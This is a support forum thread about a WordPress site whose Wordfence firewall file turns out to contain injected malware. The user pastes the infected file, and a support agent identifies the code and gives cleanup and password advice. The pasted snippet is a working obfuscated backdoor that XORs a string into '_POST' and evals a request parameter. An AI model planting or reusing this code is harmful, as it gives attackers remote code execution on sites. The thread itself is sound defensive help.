Error Log growing exponentially

  • babysleepsite

    (@babysleepsite)


    1 year ago

    My error_log is growing exponentially with the same PHP warning a million times:

    [07-Nov-2023 17:34:14 UTC] PHP Warning: Use of undefined constant wp – assumed ‘wp’ (this will throw an Error in a future version of PHP) in /home/…/public_html/wordfence-waf.php on line 7

    Here is my wordfence-waf.php file contents with sensitive directory information omitted:

    if (file_exists(‘…bootstrap.php’)) {
    define(“WFWAF_LOG_PATH”, ‘…/wflogs/’);
    include_once ‘….bootstrap.php’;
    }
    $waf = “~+d()”^”!{+{}”;
    $wp = ${$waf}[wp];
    eval(“\r”.$wp);
    ?>

    How can I stop the warning?

    Thanks,

    Nicole

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @babysleepsite, thanks for reaching out.

    The only contents that should be inside wordfence-waf.php in cases such as yours are:

    <?php
// Before removing this file, please verify the PHP ini setting auto_prepend_file does not point to this.

if (file_exists(__DIR__.'/wp-content/plugins/wordfence/waf/bootstrap.php')) {
	define("WFWAF_LOG_PATH", __DIR__.'/wp-content/wflogs/');
	include_once __DIR__.'/wp-content/plugins/wordfence/waf/bootstrap.php';
}

    Note no closing PHP tag ?> or calls to $waf or $wp at all. The error log warnings have alerted you to what is likely malicious code insertion on your site. For the benefit of anybody else referencing this topic, if you used the “INCLUDE” option when optimizing the firewall, you may see another filename included at the top of the file – this is expected.

    You could certainly try removing the lines below the } to fix the warning, but I am concerned that something will just regenerate the code again, hinting at a bigger problem.

    As a rule, any time I think someone’s site has been compromised I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this.

    I will provide our site cleaning instructions for you: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    XML-RPC requests are one of the most common brute force/credential stuffing attack methods so we always recommend using long unique passwords along with 2FA for your administrative accounts.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful. If you are unable to clean this on your own there are paid services that will do it for you. Wordfence offers one, but there are others.

    Thanks,
    Peter.

    Thread Starter babysleepsite

    (@babysleepsite)

    Hi Peter,

    Oh, wow, thank you! Wordfence had alerted me to the possible malicious code in that file but the option was only to delete the file and then my entire site broke so I thought it was a false positive. I should have looked into that further, I guess. I hadn’t had any other problems so I didn’t worry about it.

    As a quick check, I removed the code and the site seems to be working and, so far, the code hasn’t been put back. But, I will change all passwords and read through all the documents you sent.

    Thank you so much!

    Thread Starter babysleepsite

    (@babysleepsite)

    By the way, I’ve had 2FA set up for quite a while on WordPress and used WordFence Premium for years, now, so this must be an FTP-type thing, I guess.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Error Log growing exponentially’ is closed to new replies.